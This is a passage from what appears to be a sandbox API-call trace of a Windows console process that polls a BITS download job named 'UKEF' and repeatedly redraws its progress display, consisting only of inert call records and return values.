dwCursorPosition=0x0) returned 1 [0028.112] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0028.112] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ecf80 | out: lpConsoleScreenBufferInfo=0x1ecf80) returned 1 [0028.113] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1ecfc0, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1ecfc0*=0xa) returned 1 [0028.113] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0028.113] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ecf80 | out: lpConsoleScreenBufferInfo=0x1ecf80) returned 1 [0028.113] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x1ecfc0, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1ecfc0*=0x5) returned 1 [0028.113] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0028.114] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ecf80 | out: lpConsoleScreenBufferInfo=0x1ecf80) returned 1 [0028.114] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x1ecfc0, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1ecfc0*=0x7) returned 1 [0028.114] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0028.114] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ecf80 | out: lpConsoleScreenBufferInfo=0x1ecf80) returned 1 [0028.114] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1ecfc0, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1ecfc0*=0x8) returned 1 [0028.114] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0028.115] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ecf80 | out: lpConsoleScreenBufferInfo=0x1ecf80) returned 1 [0028.115] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1ecfc0, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1ecfc0*=0x8) returned 1 [0028.115] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0028.115] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ecf80 | out: lpConsoleScreenBufferInfo=0x1ecf80) returned 1 [0028.115] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x1ecfc0, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1ecfc0*=0xc) returned 1 [0028.116] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0028.116] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ecf80 | out: lpConsoleScreenBufferInfo=0x1ecf80) returned 1 [0028.116] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1ecfc0, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1ecfc0*=0xa) returned 1 [0028.116] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0028.116] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ecf80 | out: lpConsoleScreenBufferInfo=0x1ecf80) returned 1 [0028.116] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x6, lpNumberOfCharsWritten=0x1ecfc0, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1ecfc0*=0x6) returned 1 [0028.117] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0028.117] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ecf80 | out: lpConsoleScreenBufferInfo=0x1ecf80) returned 1 [0028.117] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1ecfc0, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1ecfc0*=0x8) returned 1 [0028.117] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0028.117] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1ecfd8 | out: _Buffer="0") returned 1 [0028.117] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1ecfd8 | out: _Buffer="1") returned 1 [0028.117] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ecf80 | out: lpConsoleScreenBufferInfo=0x1ecf80) returned 1 [0028.118] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x1ecfc0, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1ecfc0*=0x5) returned 1 [0028.118] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0028.118] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ecf80 | out: lpConsoleScreenBufferInfo=0x1ecf80) returned 1 [0028.118] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1ecfc0, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1ecfc0*=0x8) returned 1 [0028.119] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0028.119] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1ecfd8 | out: _Buffer="0") returned 1 [0028.119] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1ecfd8 | out: _Buffer="196608") returned 6 [0028.119] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1ecfd8 | out: _Buffer="0") returned 1 [0028.119] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ecff0 | out: lpSystemTimeAsFileTime=0x1ecff0*(dwLowDateTime=0x16b25ed0, dwHighDateTime=0x1d38a44)) [0028.119] _finite (_X=0x1ecff0) returned 1 [0028.119] _finite (_X=0x7ff0000000000000) returned 1 [0028.119] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ecf40 | out: lpConsoleScreenBufferInfo=0x1ecf40) returned 1 [0028.119] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x11, lpNumberOfCharsWritten=0x1ecf80, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1ecf80*=0x11) returned 1 [0028.119] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0028.119] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ecf40 | out: lpConsoleScreenBufferInfo=0x1ecf40) returned 1 [0028.120] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x1ecf80, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1ecf80*=0xf) returned 1 [0028.120] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0028.120] _vsnwprintf (in: _Buffer=0x1ecd90, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x1ecd48 | out: _Buffer="0.00 B/S") returned 8 [0028.120] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ecfb0 | out: lpConsoleScreenBufferInfo=0x1ecfb0) returned 1 [0028.120] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1ecff0, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1ecff0*=0x8) returned 1 [0028.120] CoTaskMemFree (pv=0x24d760) [0028.120] SetTimer (hWnd=0x0, nIDEvent=0x0, uElapse=0x3e8, lpTimerFunc=0x0) returned 0x7fcb [0028.120] IBackgroundCopyJob:GetType (in: This=0x263b58, pVal=0x1eebc8 | out: pVal=0x1eebc8) returned 0x0 [0028.127] IBackgroundCopyJob:GetProgress (in: This=0x263b58, pVal=0x263c50 | out: pVal=0x263c50) returned 0x0 [0028.127] IBackgroundCopyJob:GetPriority (in: This=0x263b58, pVal=0x1eebd0 | out: pVal=0x1eebd0) returned 0x0 [0028.128] CoTaskMemFree (pv=0x0) [0028.128] IBackgroundCopyJob:GetDisplayName (in: This=0x263b58, pVal=0x1eebd8 | out: pVal=0x1eebd8*="UKEF") returned 0x0 [0028.128] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeb00 | out: lpConsoleScreenBufferInfo=0x1eeb00) returned 1 [0028.128] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x1eeb38 | out: lpNumberOfCharsWritten=0x1eeb38) returned 1 [0028.128] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x1eeb38 | out: lpNumberOfAttrsWritten=0x1eeb38) returned 1 [0028.129] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1 [0028.129] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0028.129] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0028.129] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0xa) returned 1 [0028.129] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0028.129] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0028.129] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x5) returned 1 [0028.130] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0028.130] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0028.130] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x7) returned 1 [0028.130] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0028.130] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0028.130] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x8) returned 1 [0028.131] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0028.131] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0028.131] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x8) returned 1 [0028.131] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0028.131] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0028.131] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0xc) returned 1 [0028.131] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0028.132] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0028.132] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0xa) returned 1 [0028.132] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0028.132] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0028.132] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x6, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x6) returned 1 [0028.132] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0028.132] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0028.133] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x8) returned 1 [0028.133] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0028.133] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1eeb18 | out: _Buffer="0") returned 1 [0028.133] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1eeb18 | out: _Buffer="1") returned 1 [0028.133] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0028.133] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x5) returned 1 [0028.133] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0028.133] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0028.133] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x8) returned 1 [0028.134] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0028.135] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1eeb18 | out: _Buffer="0") returned 1 [0028.135] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1eeb18 | out: _Buffer="196608") returned 6 [0028.135] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1eeb18 | out: _Buffer="0") returned 1 [0028.135] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1eeb30 | out: lpSystemTimeAsFileTime=0x1eeb30*(dwLowDateTime=0x16b4c030, dwHighDateTime=0x1d38a44)) [0028.135] _finite (_X=0x1eeb30) returned 1 [0028.135] _finite (_X=0x7ff0000000000000) returned 1 [0028.135] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eea80 | out: lpConsoleScreenBufferInfo=0x1eea80) returned 1 [0028.135] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x11, lpNumberOfCharsWritten=0x1eeac0, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeac0*=0x11) returned 1 [0028.135] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0028.135] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eea80 | out: lpConsoleScreenBufferInfo=0x1eea80) returned 1 [0028.135] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x1eeac0, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeac0*=0xf) returned 1 [0028.135] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0028.136] _vsnwprintf (in: _Buffer=0x1ee8d0, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x1ee888 | out: _Buffer="0.00 B/S") returned 8 [0028.136] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeaf0 | out: lpConsoleScreenBufferInfo=0x1eeaf0) returned 1 [0028.136] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1eeb30, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb30*=0x8) returned 1 [0028.136] CoTaskMemFree (pv=0x24d760) [0028.136] PeekMessageW (in: lpMsg=0x1efa28, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1efa28) returned 0 [0028.136] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x1efa08*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1 [0029.133] PeekMessageW (in: lpMsg=0x1efa28, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1efa28) returned 1 [0029.133] KillTimer (hWnd=0x0, uIDEvent=0x7fcb) returned 1 [0029.133] PeekMessageW (in: lpMsg=0x1efa28, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1efa28) returned 0 [0029.133] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x1efa08*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1 [0035.615] PeekMessageW (in: lpMsg=0x1efa28, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1efa28) returned 1 [0035.615] TranslateMessage (lpMsg=0x1efa28) returned 0 [0035.615] DispatchMessageW (lpMsg=0x1efa28) returned 0x1 [0035.616] IBackgroundCopyCallback:JobModification (This=0x263c30, pJob=0x263d18, dwReserved=0x0) returned 0x0 [0035.616] IBackgroundCopyJob:GetState (in: This=0x263b58, pVal=0x263c48 | out: pVal=0x263c48) returned 0x0 [0035.616] IBackgroundCopyJob:GetType (in: This=0x263b58, pVal=0x1eebc8 | out: pVal=0x1eebc8) returned 0x0 [0035.617] IBackgroundCopyJob:GetProgress (in: This=0x263b58, pVal=0x263c50 | out: pVal=0x263c50) returned 0x0 [0035.618] IBackgroundCopyJob:GetPriority (in: This=0x263b58, pVal=0x1eebd0 | out: pVal=0x1eebd0) returned 0x0 [0035.618] CoTaskMemFree (pv=0x0) [0035.618] IBackgroundCopyJob:GetDisplayName (in: This=0x263b58, pVal=0x1eebd8 | out: pVal=0x1eebd8*="UKEF") returned 0x0 [0035.619] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeb00 | out: lpConsoleScreenBufferInfo=0x1eeb00) returned 1 [0035.619] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x1eeb38 | out: lpNumberOfCharsWritten=0x1eeb38) returned 1 [0035.619] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x1eeb38 | out: lpNumberOfAttrsWritten=0x1eeb38) returned 1 [0035.619] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1 [0035.619] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0035.619] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0035.619] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0xa) returned 1 [0035.620] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0035.620] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0035.620] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x5) returned 1 [0035.620] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0035.620] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0035.620] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x7) returned 1 [0035.620] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0035.621] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0035.621] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x8) returned 1 [0035.621] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0035.621] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0035.621] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x8) returned 1 [0035.621] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0035.621] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0035.621] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xe, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0xe) returned 1 [0035.622] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0035.622] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0035.622] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0xa) returned 1 [0035.623] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0035.623] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0035.623] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x6, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x6) returned 1 [0035.623] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0035.623] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0035.623] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x8) returned 1 [0035.623] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0035.624] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1eeb18 | out: _Buffer="0") returned 1 [0035.624] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1eeb18 | out: _Buffer="1") returned 1 [0035.624] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0035.624] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x5) returned 1 [0035.624] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0035.624] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0035.624] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 